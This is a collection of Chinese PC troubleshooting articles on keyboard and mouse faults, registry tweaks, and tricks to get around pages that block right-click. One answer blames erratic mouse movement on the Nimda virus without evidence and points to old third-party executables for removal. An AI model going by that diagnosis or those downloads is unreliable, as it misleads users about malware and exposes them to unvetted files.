[color=Blue]这种故障为键盘的“卡键”故障，不仅仅是使用很久的旧键盘，有个别没用多久的新键盘上，键盘的卡键故障也有时发生。出现键盘的卡键现象主要由以下两个原因造成的：一种原因就是键帽下面的插柱位置偏移，使得键帽按下后与键体外壳卡住不能弹起而造成了卡键，此原因多发生在新键盘或使用不久的键盘上。另一个原因就是按键长久使用后，复位弹簧弹性变得很差，弹片与按杆摩擦力变大，不能使按键弹起而造成卡键，此种原因多发生在长久使用的键盘上。当键盘出现卡键故障时，可将键帽拨下，然后按动按杆。若按杆弹不起来或乏力，则是由第二种原因造成的，否则为第一种原因所致。若是由于键帽与键体外壳卡住的原因造成“卡键”故障，则可在键帽与键体之间放一个垫片，该垫片可用稍硬一些的塑料(如废弃的软磁盘外套)做成，其大小等于或略大于键体尺寸，并且在按杆通过的位置开一个可使铵杆自由通过的方孔，将其套在按杆上后，插上键帽；用此垫片阻止键帽与键体卡住，即可修复故障按键；若是由于弹簧疲劳，弹片阻力变大的原因造成卡键故障，这时可特键体打开，稍微拉伸复位弹簧使其恢复弹性；取下弹片将键体恢复。通过取下弹片，减少按杆弹起的阻力，从而使故障按键得到了恢复。
[/color]
[color=Red]常见故障二：某些字符不能输入。[/color]
[color=Blue]若只有某一个键字符不能输入，则可能是该按键失效或焊点虚焊。检查时，按照上面叙述的方法打开键
盘，用万用表电阻档测量接点的通断状态。若键按下时始终不导通，则说明按键簧片疲劳或接触不良，需要修理或更换；若键按下时接点通断正常，说明可能是因虚焊、脱焊或金屑孔氧化所致，可沿着印刷线路逐段测量，找出故障进行重焊；若因金属孔氧化而失效，可将氧化层清洗干净，然后重新焊牢；若金属孔完全脱落而造成断路时，可另加焊引线进行连接。 [/color]

[color=Red]常见故障三：若有多个既不在同一列，也不在同一行的按键都不能输入。 [/color]
[color=Blue]可能是列线或行线某处断路，或者可能是逻辑门电路产生故障。这时可用100MHz的高频示波器进行检测，找出故障器件虚焊点，然后进行修复。[/color]

[color=Red]常见故障四：键盘输入与屏幕显示的字符不一致。[/color]
[color=Blue]此种故障可能是由于电路板上产生短路现象造成的，其表现是按这一键却显示为同一列的其他字符，此时可用万用表或示波器进行测量，确定故障点后进行修复。 [/color]

[color=Red]常见故障五：按下一个键产生一串多种字符，或按键时字符乱跳。[/color]
[color=Blue]这种现象是由逻辑电路故障造成的。先选中某一列字符，若是不含回车键的某行某列，有可能产生多个其他字符现象；若是含回车键的一列，将会产生字符乱跳且不能最后进入系统的现象，用示波器检查逻辑电路芯片，找出故障芯片后更换同型号的新芯片，排除故障


键盘导致多选故障

《一键清理系统垃圾》

键盘导致多选故障

《中国电脑教育报》董春晖

    近日好友来电求援，说电脑出现怪事，只能进入安全模式，点击文件时有多个文件被选中，不知何故。我问他最近是否装过什么东西，他说没有，这就排除了系统故障。那能是什么原因呢？我想到他后面说的那句话，曾经遇到过由于键盘粘滞使鼠标每次点击文件时都选取多个文件的情况，会不会是这个原因使系统认为硬件有故障而直接进入安全模式呢？于是我让他把所有的Ctrl、Alt、Shift键都多按几次，再次启动电脑一切OK。这么简单的小问题，把我的朋友折腾了好几天，连他自己都不敢相信竟会如此简单。这里我提醒大家注意两点：一是现在的键盘是越来越不过关，建议大家别太贪图便宜。二是电脑要经常清洁，特别是键盘上的常用键。


别忘了给电脑“充电”

《一键清理系统垃圾》

别忘了给电脑“充电”

《中国电脑教育报》

    “什么，电脑不亮了？”“我马上就来！”

    刚要躺下小憩，一阵急促的电话铃声把我拖了起来，唉！谁叫他是我的好朋友呢……

    “他的电脑启动不亮，小Case， 十分钟就能回来了！”丢下一句话便飞奔而去。

    到了他家开机，显示器显示“无信号输入”。关机重新将显示器接好，再开机还是不亮。打开机箱，将显示卡拔下，再重新插上，开机又是不亮（头上开始冒汗）。难道是内存的毛病？将内存拔掉，找来一只毛笔，刷了几下，重新插好。开机还是不亮（拿起主人的烟点上，手在发颤）。干脆拔掉所有连接线，取下主板，顺便将锂电池取下，检查一番又重新装好。开机正常，还顺利进入到瘟酒吧（注：Windows98）……

    既然没问题了，就装好机箱，从新开机再试一下，我就可以回家了。没想到装好后再开机又启动不了。想来想去，忽然想到是不是主板的电池没电了？于是立刻去买了一颗新电池换上，重新开机故障彻底消除！原来是锂电池用了三年，该换了！

    从此我的笔记本电脑上又多了一句“遇到此类古董机时，别记了给它‘充电’”。（请作者与本版责编联系）


键盘故障两例

《一键清理系统垃圾》

键盘故障两例

      某网吧服务器突然自动重启,自检通过但Windows无法启动，在蓝天白云之后，系统黑屏，提示出现保护性错误。

       故障1

       处理过程：

       分析：依据提示，可以将其推测为一般的硬件故障。打开机箱观察，主板及各板卡都正常无异，CPU微热，应该是没有问题。用替换法逐一替换CPU、内存、硬盘和显卡，均无法解决问题。无奈中只好决定用一台客户机暂时替代服务器工作。奇怪的是原本工作正常的客户机搬到服务台后也不能正常工作了，出现了同样的保护性错误。

       而当服务器搬到客户机的机位后又能正常工作了！由于先前替换的部件均是该客户机的，故焦点集中到未曾替换的鼠标和键盘上。先更换一鼠标，故障依旧。再更换键盘，呵呵，终于看到久违的桌面了！

       后据老板回忆，出现故障前曾在服务器前喝饮料，不慎将饮料洒到了键盘上，随即用吸水纸擦了键盘，机器并无特别反应。

       小结：这一故障实际上就是由于键盘电路短路从而导致机器出现保护性错误。一开始键盘虽被弄湿，但由于未浸入电路而没有使故障显现出来。以此为鉴，最好不要在电脑前吃喝，以免导电液体进入键盘造成短路。对于已经短路的键盘，可以将其拆开，仔细擦拭，烘干电路板，一般就可以继续使用了。

       故障2

       处理过程：

       分析：按下困难，说明有阻碍物，卸下键盘，取出回车键，发现回车键的键柱上堆积了很多污垢。用小刀轻轻刮掉污垢，将按键装回原位，感觉轻松多了。但弹起还是不很利索，估计是弹性橡胶垫老化，于是将平时不常用的Scroll Lock键的胶垫与之交换，装好键盘，故障解决。

       小结：平时应注意键盘的防尘清洁工作，要经常清除灰尘，按键也要注意保护，采用正确的敲击方法，不可按住某个键不放而使胶垫老化导致失效。个别失效的按键可以想办法用不常用的按键的橡胶垫拿来应急，这样既可以锻炼我们的动，还可以节省几元大洋，呵呵！


解决鼠标乱动问题

《一键清理系统垃圾》

解决鼠标乱动问题

   现象：鼠标有时胡乱乱动，不听指挥。我怀疑是有病毒或木马之类，所以用金山毒霸、iparmor5.33、the cleaner查杀过，均未发现过问题。但我在“系统信息→正在运行的任务”下发现几个没有路径、版本和任何信息的任务。不知道和这有没有关，请问这三个任务是什么东西，能否删除，怎样删除？

这是一种NIMDA病毒。解决方案如下：

(1) 检查临时文件夹是否存在MEPXXXX. tmp 和MEPXXXX.tmp.exe文件，XXXX是由字幕和数字随机组成的字符串。

(2) 检查C:\，D:\，E:\是否存在httpodbc.dll文件。

(3) 是否带宽被严重占用。

(4) 在Windows 9x/ME系统中，\Windows\ system目录下是否存在LOAD.exe文件。

(5) 在Windows NT/2K系统中，\Windows\ System目录下是否存在CSRSS.exe隐藏文件。

建议你下载Symantec和Trendmicro的查杀Nimda_E病毒工具进行检测和清除。http://support.marsec.net/focus/nimda_e/FxNimdaE.com

http://support.marsec.net/focus/nimda/trend_nimda.zip

查杀步骤：

（1）在http://support.marsec.net/focus/nimda_e/FxNimdaE.com下载FxNimdaE.com，存放在系统里。

（2）停掉系统所有正在运行的程序。如果你的系统是Windows Me，你必须停掉Windows Me的系统恢复功能，因为病毒有可能被自动保存在备份目录里。双击运行FxNimdaE. com，运行此程序需要你以系统管理员帐号登录，在操作前停掉IIS服务或者拔离网线，以免在清除过程中再次感染。然后点击Start键运行程序直到报告说系统已经清除掉病毒。


解决鼠标右键被锁定

《一键清理系统垃圾》

解决鼠标右键被锁定

    问：我的电脑不知道为什么鼠标右键被锁定了，用不了。请问如何解决？

    答：可能是有人在你的注册表中做了手脚，锁定了右键菜单。打开注册表编辑器，选择以下子键：

    “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”在右窗格中找一个名为“NoViewContexMenu”的键值，把其数据改为00 00 00 00。或者干脆删除这个键值即可。


破解网页禁用鼠标右键

《一键清理系统垃圾》

破解网页禁用鼠标右键

    1，出现版权信息类的，破解方法：在页面目标上按下鼠标右键，弹出限制窗口，这时不要松开右键，将鼠标指针移到窗口的“确定”按钮上，同时按下左键。松开鼠标左键，限制窗口就被关闭了，再将鼠标移到目标上松开鼠标右键，哈哈，就这样弹出了鼠标右键菜单，限制被取消了！有成就感吧！

    2，出现“添加到收藏夹”的。破解方法：在目标上点鼠标右键，出现添加到收藏夹的窗口，不要松开右键，也不要移动鼠标，而是使用键盘的TAB键，移动到取消按钮上，按下空格键，这时窗口就消失了，松开右键看看，右键又恢复了！

    3，超链接无法用鼠标右键弹出“在新窗口中打开”菜单的。用这一招：在超链接上点击鼠标右键，弹出窗口，不要松开右键，按键盘上的空格键，窗口消失了，这时在松开右键，右键菜单便会出现，选择其中的“在新窗口中打开”就OK了


巧修键盘

《一键清理系统垃圾》

巧修键盘

    朋友有一个键盘，开机自检能通过，可是打字时，A、S、D、F和V、I、O、P这两组键打不出字符来。近来，上网聊天非常不便，就拿到我这里来死马当作活马医。
    拆开键盘便看到了透明塑料板上的电路，满是任天堂游戏机手柄上的触点。首先检查按键是否能够将触点压在一起，一切正常。再用万用表量触点压在一起时是否能导电，一切正常。这时又检查了和电路板的接触点是否导电，还是正常。分析了各分电路，都正常，难道是中途的连接电路有毛病。于是仔细检查，发现连接电路中有一段电路金属膜掉了一部分，看起来有些稀疏。用万用表一量，电阻非常大。可能是因为电阻大了电信号不能传递，而且正好是那两组字母键的公共线，所以键是成组地打不出字符来。
    要将塑料电路连接起来可不是件简单的事。因为不能用电烙铁焊接，一焊接，塑料就会化掉。我先将导线两端的铜线剥出，在电阻还很小的可用电路两边扎两个洞（一定要避开坏的那一段），将导线剥出的铜线从洞中穿过去，就像绑住电路一样，另一头也如法炮制。用万用表量，通了！用外壳将其压牢，还垫了些纸以防松动。上机一用，一切正常了。


让键盘不再跳舞

《一键清理系统垃圾》

让键盘不再跳舞

《中国电脑教育报》罗彬

    最近我新买的电脑发生了这样一个故障：一输入数字字符就会被打乱，情况好像在跳舞一般；本应输入一个字符8，显示出来后就成了8**（*为任意字符）；且在打字的时候也不定期地出现打一个字符显示多个字符的现象，这造成电脑无法正常输入数据，无法上网（密码不能正常输入）。可是当我使用鼠标调出游戏选择键盘模式操作时，却一切正常。用杀毒软件在Windows状态和DOS状态下进行了全面查杀，结果是没有任何病毒。难道是我的键盘发生故障了？我关上电脑，取下键盘放在眼前仔细观看，没有看出任何猫儿腻（内行看门道，我这外行也只是看热闹啦……）。无奈之下，使用十字螺丝刀将键盘拆开，呈现在眼前的是一排排粉红色的橡胶帽。在检查了橡胶帽和键位的接触，确信正确后装好键盘再次开机。可是故障依旧，只是按任意键都会显示更多的字符。怎么办？我拧着脑袋苦想：难道去外面买个键盘回来换上？可现在大过年的，电脑城早休市了啊。再回想，在发生故障以前一切都是那么的正常，昨天姑娘们来玩电脑的时候还好好的。而且，我的系统本来就装了杀毒软件，盗版软件也没怎么用过，更别提我的新键盘还是罗技的易上手了……

    正在凝思苦想的时候，女友给我一杯温水，我猛然联想到了问题的所在：昨天姑娘们来玩电脑的时候，边打闹边喝饮料，都是围绕在电脑旁边。对！问题可能就在这里，她们无意中把水滴进了我心爱的键盘，造成了这次故障。

    怀着激动的心情，我这个才买电脑10天不到的菜鸟再次拆开键盘，对着在阳光的照射，键盘内部的3层电路膜闪闪发光，已经沾上了不少的水珠。我赶紧把键盘平放在床上并固定好，然后拿出女友的面巾纸分层擦拭电路膜，最后还在太阳下小晒了一会儿。等残留的水珠被蒸发掉，再将键盘装上开机，再没发生先前字符错乱的故障了。


如何正确处理系统不认鼠标的故障

《一键清理系统垃圾》

如何正确处理系统不认鼠标的故障

    所谓系统不认鼠标，是指开机自检后，系统报“鼠标没有检测到"或屏幕显示“没有安装鼠标"，而实际上是安装了鼠标及其驱动程序的。

    要使鼠标正常工作，一是要硬件工作正常，二是要装入正确的驱动程序，三是要进行正确的设置。而系统不承认有鼠标的故障可由接触不良、鼠标模式设置错误、鼠标的硬件故障、病毒或主板故障等引起，一般按下列步骤检查和处理：

    1.首先拔插鼠标与主机的接口插头，检查接触是否良好，处理后重新启动系统。

    2.如果故障仍存在，拔下鼠标的接口插头，换一COM接口插上去，并把CMOS中对COM接口的设置作相应的修改，重新开机启动。

    3.若没有解决问题，则检查鼠标底部是否有模式设置开关，如果有，试着改变其位置，重新启动系统。若没有解决问题，仍把开关拨回原位。

    4.若故障仍存在，则用替换法，将另一只正常的相同型号的鼠标与主机连接，再开机启动。

    5.若故障消失，则说明是鼠标的硬件故障引起的，检查鼠标的接口插头和连线有无问题，如无问题，再检查鼠标的X轴和Y轴的移动机构或光电接收电路系统有无问题。

    6.若用替换法后故障仍存在，则说明是软故障。退出Windows后，在DOS下检查CONFIG.SYS文件或AUTOEXEC.BAT文件中是否已加入了鼠标驱动程序；若没有，则装入鼠标驱动程序。

    7.若在DOS下已加入了鼠标驱动程序，再在Windows下检查SYSTEM.INI文件BOOT段中是否加入了MOUSE.DRV=<文件名>设置项。

    8.若故障仍存在，则用KV300进行检测杀毒，重新冷启动后，检查鼠标驱动程序是否完好，如有问题应重新安装。如果驱动程序是好的，再检查CMOS的内容是否被修改，如被修改应重新设置，然后再次开机启动。

    9.若经以上检查后故障仍存在，就怀疑主板线路有故障，送专业人员修理。


删除遗留的鼠标右键菜单项

《一键清理系统垃圾》

删除遗留的鼠标右键菜单项

    问：我在电脑中已经删除了Winamp，但是右击某些文件夹时，右键菜单中依然会有“用Winamp播放”等选项。请问怎样删除它们？

    答：打开注册表：找到HKEY_LOCAL_MACHINE\Software\CLASSES\Folder\shell\
HKEY_LOCAL_MACHINE\Software\CLASSES\Directory\shell\
两个键值，看看是否有相应的键值。并且在注册表查找“Winamp”等关键字，删除相应的键值即可。注意删除前清洗备份注册表！


鼠标

《一键清理系统垃圾》

鼠标

[color=Green]鼠标的故障分析与维修比较简单，大部分故障为接口或按键接触不良、断线、机械定位系统脏污。少数故障为鼠标内部元器件或电路虚焊，这主要存在于某些劣质产品中，其中尤以发光二极管、IC电路损坏居多。 [/color]
[color=Red]常见故障一：找不到鼠标 [/color]
[color=Blue]1. 鼠标彻底损坏，需要更换新鼠标。
    2. 鼠标与主机连接串口或PS/2口接触不良，仔细接好线后，重新启动即可。
    3. 主板上的串口或PS/2口损坏，这种情况很少见，如果是这种情况，只好去更换一个主板或使用多功能卡上的串口。
    4. 鼠标线路接触不良，这种情况是最常见的。接触不良的点多在鼠标内部的电线与电路板的连接处。故障只要不是再PS/2接头处，一般维修起来不难。通常是由于线路比较短，或比较杂乱而导致鼠标线被用力拉扯的原因，解决方法是将鼠标打开，再使用电烙铁将焊点焊好。还有一种情况就是鼠标线内部接触不良，是由于时间长而造成老化引起的，这种故障通常难以查找，更换鼠标是最快的解决方法。[/color]

[color=Red]常见故障二：鼠标能显示，但无法移动 [/color]
[color=Blue]鼠标的灵活性下降，鼠标指针不像以前那样随心所欲，而是反应迟钝，定位不准确，或干脆不能移动了。这种情况主要是因为鼠标里的机械定位滚动轴上积聚了过多污垢而导致传动失灵，造成滚动不灵活。维修的重点放在鼠标内部的X轴和Y轴的传动机构上。解决方法是，可以打开胶球锁片，将鼠标滚动球卸下来，用干净的布蘸上中性洗涤剂对胶球进行清洗，摩擦轴等可用采用酒精进行擦洗。最好在轴心处滴上几滴缝纫机油，但一定要仔细，不要流到摩擦面和码盘栅缝上了。将一切污垢清除后，鼠标的灵活性恢复如初。
[/color]

[color=Red]常见故障三：鼠标按键失灵 [/color]
[color=Blue]1. 鼠标按键无动作，这可能是因为鼠标按键和电路板上的微动开关距离太远或点击开关经过一段时间的使用而反弹能力下降。拆开鼠标，在鼠标按键的下面粘上一块厚度适中的塑料片，厚度要根据实际需要而确定，处理完毕后即可使用。

    2. 鼠标按键无法正常弹起，这可能是因为当按键下方微动开关中的碗形接触片断裂引起的，尤其是塑料簧片长期使用后容易断裂。如果是三键鼠标，那么可以将中间的那一个键拆下来应急。如果是品质好的原装名牌鼠标，则可以焊下，拆开微动开关，细心清洗触点，上一些润滑脂后，装好即可使用。


鼠标常见故障分析和解决

《一键清理系统垃圾》

鼠标常见故障分析和解决

    鼠标虽小，但由于GUI图形化界面的普及，使得鼠标已经成为使用计算机过程中实现人机交流的重要工具。鼠标使用频繁，因而会经常发生鼠标不能使用或使用不灵活的故障。

    一、找不到鼠标

    1.鼠标彻底损坏，需要更换新鼠标。

    2.鼠标与主机连接串口或PS/2口接触不良，仔细接好线后，重新启动即可。

    3.主板上的串口或PS/2口损坏，这种情况很少见，如果是这种情况，只好去更换一个主板或使用多功能卡上的串口。

    4.鼠标线路接触不良，这种情况是最常见的。接触不良的点多在鼠标内部的电线与电路板的连接处。故障只要不是再PS/2接头处，一般维修起来不难。通常是由于线路比较短，或比较杂乱而导致鼠标线被用力拉扯的原因，解决方法是将鼠标打开，再使用电烙铁将焊点焊好。还有一种情况就是鼠标线内部接触不良，是由于时间长而造成老化引起的，这种故障通常难以查找，更换鼠标是最快的解决方法。

    二、鼠标能显示，但无法移动

    鼠标的灵活性下降，鼠标指针不像以前那样随心所欲，而是反应迟钝，定位不准确，或干脆不能移动了。这种情况主要是因为鼠标里的机械定位滚动轴上积聚了过多污垢而导致传动失灵，造成滚动不灵活。维修的重点放在鼠标内部的X轴和Y轴的传动机构上。解决方法是，可以打开胶球锁片，将鼠标滚动球卸下来，用干净的布蘸上中性洗涤剂对胶球进行清洗，摩擦轴等可用采用酒精进行擦洗。最好在轴心处滴上几滴缝纫机油，但一定要仔细，不要流到摩擦面和码盘栅缝上了。将一切污垢清除后，鼠标的灵活性恢复如初。

    三、鼠标按键失灵

    1.鼠标按键无动作，这可能是因为鼠标按键和电路板上的微动开关距离太远或点击开关经过一段时间的使用而反弹能力下降。拆开鼠标，在鼠标按键的下面粘上一块厚度适中的塑料片，厚度要根据实际需要而确定，处理完毕后即可使用。

    2.鼠标按键无法正常弹起，这可能是因为当按键下方微动开关中的碗形接触片断裂引起的，尤其是塑料簧片长期使用后容易断裂。如果是三键鼠标，那么可以将中间的那一个键拆下来应急。如果是品质好的原装名牌鼠标，则可以焊下，拆开微动开关，细心清洗触点，上一些润滑脂后，装好即可使用。

    四、计算机不认鼠标

    1.计算机不认鼠标是指鼠标的所有操作均不起作用。计算机不认鼠标的原因很多，有可能是软件的原因，也可能是硬件的原因。软件原因包括计算机有病毒、没有正确安装鼠标驱动程序、应用软件与鼠标驱动程序发生冲突等多种情况。对软件原因，应先检查鼠标驱动程序是否已正确安装；计算机是否存在病毒；然后再检查应用软件是否不支持所使用的鼠标。

    2.在计算机不认鼠标硬件故障的原因中，比较常见的原因是断线。由于鼠标是处于不断运动之中的，如果信号线质量不好或拉扯用力过大，就易造成断线。多数情况下，断点处于鼠标这一端，因此出现断线后，只要将信号线鼠标这一端剪掉一小截，然后再重新将线焊好，一般就能排除故障。


鼠标常见故障分析与维修

《一键清理系统垃圾》

鼠标常见故障分析与维修

    鼠标的故障分析与维修比较简单，大部分故障为接口或按键接触不良、断线、机械定位系统脏污。少数故障为鼠标内部元器件或电路虚焊，这主要存在于某些劣质产品中，其中尤以发光二极管、IC电路损坏居多。
    一、找不到鼠标
    1、鼠标彻底损坏，需要更换新鼠标。
    2、鼠标与主机连接串口或PS/2口接触不良，仔细接好线后，重新启动即可。
    3、主板上的串口或PS/2口损坏，这种情况很少见，如果是这种情况，只好去更换一个主板或使用多功能卡上的串口。
    4、鼠标线路接触不良，这种情况是最常见的。接触不良的点多在鼠标内部的电线与电路板的连接处。故障只要不是再PS/2接头处，一般维修起来不难。通常是由于线路比较短，或比较杂乱而导致鼠标线被用力拉扯的原因，解决方法是将鼠标打开，再使用电烙铁将焊点焊好。还有一种情况就是鼠标线内部接触不良，是由于时间长而造成老化引起的，这种故障通常难以查找，更换鼠标是最快的解决方法。
    二、鼠标能显示，但无法移动
    鼠标的灵活性下降，鼠标指针不像以前那样随心所欲，而是反应迟钝，定位不准确，或干脆不能移动了。这种情况主要是因为鼠标里的机械定位滚动轴上积聚了过多污垢而导致传动失灵，造成滚动不灵活。维修的重点放在鼠标内部的X轴和Y轴的传动机构上。解决方法是，可以打开胶球锁片，将鼠标滚动球卸下来，用干净的布蘸上中性洗涤剂对胶球进行清洗，摩擦轴等可用采用酒精进行擦洗。最好在轴心处滴上几滴缝纫机油，但一定要仔细，不要流到摩擦面和码盘栅缝上了。将一切污垢清除后，鼠标的灵活性恢复如初。
    三、鼠标按键失灵
    1、鼠标按键无动作，这可能是因为鼠标按键和电路板上的微动开关距离太远或点击开关经过一段时间的使用而反弹能力下降。拆开鼠标，在鼠标按键的下面粘上一块厚度适中的塑料片，厚度要根据实际需要而确定，处理完毕后即可使用。
    2、鼠标按键无法正常弹起，这可能是因为当按键下方微动开关中的碗形接触片断裂引起的，尤其是塑料簧片长期使用后容易断裂。如果是三键鼠标，那么可以将中间的那一个键拆下来应急。如果是品质好的原装名牌鼠标，则可以焊下，拆开微动开关，细心清洗触点，上一些润滑脂后，装好即可使用。


鼠标误操作急救

《一键清理系统垃圾》

鼠标误操作急救

《中国电脑教育报》西贝

    在Windows对话框中，当你按下鼠标左键欲进行单击操作时，猛然发现是误按了命令按钮，此时请勿松开鼠标左键，而是按下“Esc”键，则系统将会关闭该对话框。该方法对大部分程序起作用，但对有的程序如My IE不成功。

    如果不想关闭对话框，那么可以在按住鼠标左键的情况下，将鼠标指针移动到屏幕上的空白区域，再行松开左键。该法对窗口中的菜单命令和工具栏按钮同样有效。

    在拖动鼠标的过程中，如果发现拖动操作有误，请按下“Esc”键，则取消本次拖动操作。然后，你就可以放心地松开鼠标左键了。


水“鼠”不容

《一键清理系统垃圾》

水“鼠”不容

《中国电脑教育报》meangon

    近日同学准备购置一个光电鼠标，由于笔者对电脑的了解是“名声在外”，所以很自然成了他的参谋。同学之事自然应当竭尽所能，于是我们便利用周末时间去电脑城“捕鼠”。

    货比三家后，同学看中了明基的光电鼠标，不仅因为它的外形可爱，还因为它能发出特殊的蓝光。于是，在商家的柜台上试用没有问题之后，同学便牵着一只“蓝皮鼠”回家了。回到同学家，一切安装完毕后，“蓝皮鼠”却不听指挥了，让它往左，它竟往上。原以为是中了病毒，用杀毒软件检查没有问题，这可难倒了我。没办法，只好拿回电脑城去换了。

    到了商家那里一试，那只调皮的“蓝皮鼠”竟又温顺起来，在我的指挥下惟命是从。没有出现问题商家当然不会更换，只得打道回府，临走前商家倒是提醒我们：“是不是桌子太光滑，影响到了鼠标的使用？光电鼠标不能在太光滑的桌面上使用的。”又回到同学家，把鼠标连好，故障依旧。仔细检查桌子，同学的桌子并不太光滑，倒是他的鼠标垫引起了我的注意。同学的鼠标垫比较特别，是一个密封着水的鼠标垫，质地非常柔软，光电鼠标的光照在上面映出一片幽幽的蓝色。以前我看过一些光电鼠标的介绍，说光电鼠是不能在反光能力太强的物体上操作。那么问题一定在这里了，光电鼠的光射在水上，水又把光反射回去，这就影响了鼠标。但是以前同学使用的是机械鼠标，放在这样有水的鼠标垫上却不会有影响。这么说，只要不再使用这个鼠标垫，电鼠就会听从指挥了。于是拿开鼠标垫，故障果然消失，“蓝皮鼠”又恢复了正常。


为你的“病鼠”把脉

《一键清理系统垃圾》

为你的“病鼠”把脉

    鼠标是电脑输入设备中使用频率最高的设备之一，尤其是出现了Windows系统之后，大家更是“鼠”不离手，鼠标故障率也随之上升。鼠标故障可分为机械、电路、软件三大类，其中电路故障极少出现，软件故障又随“机”应变，均不带有普遍性，这里仅谈一下带有普遍性的几种故障。
    一是按键功能正常，可是移动鼠标时，光标反应迟钝，甚至没反应了，这主要是因为脏物太多导致机械传动失灵，用酒精棉球将滚球及与滚球接触的小轮和轴清洁后即可解决。
    二是按键失灵，绝大多数是因为微动开关中的簧片折断所致。如果是三键鼠标，可用中间键位开关的簧片替换损坏的簧片(当然中间的键就不能再用了)，或者更换微动开关。如果两者都不能实现，那你的鼠标就只有报废了。注意具体操作时一定要拔下鼠标，并消除静电。
    还有一种比较特殊的故障，主要表现为：
        1) 启动Windows时，系统提示找到不鼠标，可再次启动也许就能找到鼠标；
        2) 移动鼠标时，光标有时反应迟钝之极，有时又神经质地冲出窗口，不听指挥；
        3) 在Windows窗口中，明明你什么键也没按，可系统却认为你按了鼠标键，“自动”地开个窗口什么的，让你不知所措。
        笔者初次遇到这些故障时，以为是病毒在作怪，可用了各种查杀毒软件一通“扫荡”，却连根“毒毛”也没看见。拆开鼠标彻底清洗也没用。经反复查找，终于查明故障原因是鼠标电缆中间的芯线断路。鼠标生产厂商为防止用户在使用时将电缆从鼠标中拽出，一般都让电缆在鼠标中顺“Ω”形的导线槽引出，在引出端更是一个死弯。而鼠标电缆引出端恰恰是使用中扭曲、拖拽最多的地方，使用较长时间后，电缆芯线就会被拉断，可护套完好无损，从外表上一点也看不出来，而且由于断开处时接时断，用万用表也不好测量。
    检修时，先从计算机上拔下鼠标，拆开鼠标，将电缆排线插头从电路板上拔下，并按芯线的颜色与插针的对应关系做好标记。芯线一般是压接在孔形插针上，每根插针又通过自身翘起的小金属片与插头上的小塑料挡片锁定在插头上；拆插针时，用小钟表起子轻轻挑起插头上的小塑料挡片，同时用手将线和插针一起拽出，每根插针都要如此操作。将插针都拽出后，用一只手抓住电缆护套，另一只手试着轻拉每根芯线，已断开的芯线会被拉出。确定是芯线断了以后，就要将所有没断的芯线按照断线的位置剪齐(约剪去50mm～60mm)，并使每根芯线裸露出1mm～2mm的铜线。如果手头有孔形插针和压线器，就可以照原样压线。但多数情况下，只能采用焊接的方法，将芯线焊在孔形插针的尾部。焊接时应注意，要使芯线裸露部分尽可能地短，以免芯线间短路，并且不要让助焊剂接触到孔形插针的插孔部分。焊接完成后，按标记的顺序，将插针插回到插头中，整理好电缆，再将插头插回电路板，重新组装好鼠标，即可正常使用。


修复不听话的鼠标

《一键清理系统垃圾》

修复不听话的鼠标

《中国电脑教育报》bekeman

    我的鼠标疯了！我要往上，它却往左，我要往左，它又往下，更夸张的是，在我没有动鼠标的情况下，它竟然自己扫上了雷！

    这种问题的思路不外两种，一是清理鼠标内部，二是检查电路接触不良。立刻准备大功率的吹风机、小号螺丝刀，当然少不了一瓶酒中极品——酒精！准备工作完毕，开始从第一线索入手。拧开鼠标底部的两颗螺丝，打开鼠标的顶盖：一个小球、两个齿轮和传送杆，当然还有一个看似神秘的电路板。先把电路板小心取下，然后把剩下的东西统统扔进水盆里，倒入一些去污剂，之后开始研究第二线索——线路接触不良。拿来放大镜，伏在窗前，在阳光下仔细地搜索：那块电路板上总共就4根线，都牢牢地插在那里，根本没有问题。我心中一乐——问题OK了！

    拿出洗净的零件吹干后恢复原状，插在电脑上，谁知这鼠标又自己动了起来。思考：正常的鼠标指针运动首先是鼠标运动，带动小球滚动，进而引起鼠标内的传送杆转动，传送杆另一端的齿轮便也开始转动，然后光感器感应到齿轮的转动，并根据这个计算出鼠标运动的参数并传给电脑，然后操作系统再根据传回的数据控制指针运动。既然操作系统最终控制着指针的运动，那会不会是操作系统有问题了？仔细一想，我的Windows XP用了1年了也没重装过（记得在Windows 98时代可是一个月装一回啊），虽说很稳定，但也一定会出问题，说不定这回的问题就是这个。于是找来Windows XP初始安装镜像Chost C盘，重启电脑，进入桌面——鼠标又自己乱动起来！

    突然，我恍然大悟：我还疏忽了一点，就是光感器！迅速拆开鼠标，歪头一看，果然，在横竖两排共四个感光元件上沾满了尘土和各色的粘状物，真是惨不忍睹。用棉签和酒精好好清理之后，鼠标终于听话了！

    叮当点评：这么长的文章来解决一个鼠标清洁问题，免不了被老编暴K。不过作者也够曲折的，能发明边泡鼠标边查线路这种“超线程”工作法的天才居然会忽略掉最重要的细节，一定是以前看文章不仔细。泡鼠标清洁法可以借鉴，但千万记住别把电路板也扔下去……


拯救断了线的鼠标

《一键清理系统垃圾》

拯救断了线的鼠标

   三天前，我的鼠标不幸夭折了。上街新购，这三里多路不说，又得花钱。伤心之余，决定开膛动手术，幸还有万用表可以使用，细细测量一番，不禁失笑：只是断了一根线！原来这鼠标前面十厘米左右的地方已断。拿出电烙铁仔细焊好一试，哈，完好如初。 高兴之后，又对以前损坏的旧鼠标进行了一翻研究，大都是一个毛病，照方抓药，基本痊愈。进一步分析电路及原理，发现除了连线之外，鼠标是不容易损坏的，且内部电路一致，零件大都可互换（注意大小，个头不一），PS/2口与串口除接口不一致外，没有区别。 维修中应注意： 1.鼠标中的线色各型号不一，可在鼠标上留一厘米的线头，以防接线时忘了线的顺序。 2.最好先从鼠标前十厘米处剪后测量，这是最易折断的位置，然后逐步上移，否则线太短不好用我可不负责任。 3.焊接时不用电烙铁接地或断电焊接，当然小心无大差，注意别将焊点熔在一起形成短路，焊好后测量一下，别鼠标没修好，反坏了主板，千万千万！！ 4.若焊好后使用不畅，只有上下或只有左右，可先查是不是与滚球相触的两轴上被油泥覆盖，然后轻掰一下光发射管或光接收管，一般即可复原如初。若还不行，不如就作零部件，或干脆当猫食吧。?


关闭小键盘上的NumLock

《一键清理系统垃圾》

返回总目录 上一页 目录页

关闭小键盘上的NumLock

    问：请问怎样解决启动Windows XP进入登录欢迎界面时，自动开启小键盘NumLock的问题。

    答：首先在BIOS中把NumLock项设为Enable，然后在BIOS中将PnP With OS项亦设为Enable即可。不过注销用户时NumLock小键盘锁是关闭的，要手工打开。

    打开注册表编辑器，找到HKEY_USERS\.DEFAULT\Control Panel\Keyboard，将它下面的InitialKeyboardIndicators的键值改为“2”，退出注册表编辑器，重新启动计算机，你就会发现数字小键盘的灯不再熄灭了。

    另外，仅需要对config.sys文件动点小手术即可达到此目的。设置方法如下：
